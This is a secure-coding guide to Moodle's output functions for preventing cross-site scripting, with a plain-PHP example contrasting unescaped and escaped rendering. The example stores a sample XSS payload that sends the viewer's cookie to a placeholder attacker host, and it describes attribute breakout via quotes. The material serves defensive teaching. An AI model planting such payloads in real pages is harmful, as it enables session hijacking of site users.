At some point, as you write your code, you will need to output information to the screen. Because you can't always be sure that the data you are writing out is safe, you need to process it before writing it out. This is especially true for output that has been created dynamically by others, such as forum posts, user profile fields, or anything else that originally arrived as user input.
One of the main reasons to do this is to prevent Cross Site Scripting (XSS) attacks. In an XSS attack, an attacker gets client-side script (JavaScript) into a page as it is displayed to other users. Because the injected script runs in the victim's browser, with the victim's session, it can read data that the attacker should not have (such as the session cookie or page contents) and perform actions as the victim. These attacks can be very dangerous. For more information, see the Moodle Docs page: http://docs.moodle.org/en/Development:Security:Cross-site_scripting#Cleaning_input.
Moodle provides four main functions for this purpose: p(), s(), format_text(), and format_string().
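The following is an added, stand-alone example (not code from Moodle itself) showing why dynamic output must be processed before it is echoed. It runs in plain PHP with no Moodle installation, so it uses htmlspecialchars() directly; the assumption made here is that Moodle's s() returns, and p() echoes, the same HTML-escaped form of a string. The forum post and display name are constructed sample input, and the hostname in the script is a placeholder.

```php
<?php
// Added example, not Moodle code. Assumes plain PHP 7+ and no Moodle install.
// Assumption: Moodle's s() returns and p() echoes the value escaped the way
// esc() below does (htmlspecialchars with ENT_QUOTES).

// Constructed sample input, as it might arrive from a forum post form.
// The hostname is a placeholder, not a real site.
$post = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
$displayName = "O'Brien & \"friends\"";

// 1. Unsafe: the raw string is dropped straight into the page. The browser
//    parses the <script> tag as markup and runs it in the viewer's session.
function render_unsafe(string $text): string {
    return '<div class="post">' . $text . '</div>';
}

// 2. Safe for plain text: every HTML-significant character (& < > " ') is
//    replaced by an entity, so the browser shows the text rather than
//    interpreting it. This is the job Moodle's s() and p() do.
function esc(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $text): string {
    return '<div class="post">' . esc($text) . '</div>';
}

// 3. Attribute context: ENT_QUOTES is what makes this safe. Without it a
//    single quote in $name would close the value='...' attribute and let the
//    rest of the string add new attributes such as an onfocus handler.
function render_attr(string $name): string {
    return "<input type='text' name='displayname' value='" . esc($name) . "'>";
}

echo render_unsafe($post), PHP_EOL;   // script tag reaches the browser intact
echo render_safe($post), PHP_EOL;     // &lt;script&gt;... is displayed as text
echo render_attr($displayName), PHP_EOL; // O&#039;Brien &amp; &quot;friends&quot;
```

Escaping is the right treatment for values that should never contain markup (names, titles, form values). Content that is allowed to carry limited HTML, such as the body of a forum post, needs cleaning rather than escaping, which is what format_text() is for; format_string() is the equivalent for short, single-line strings such as course or activity names.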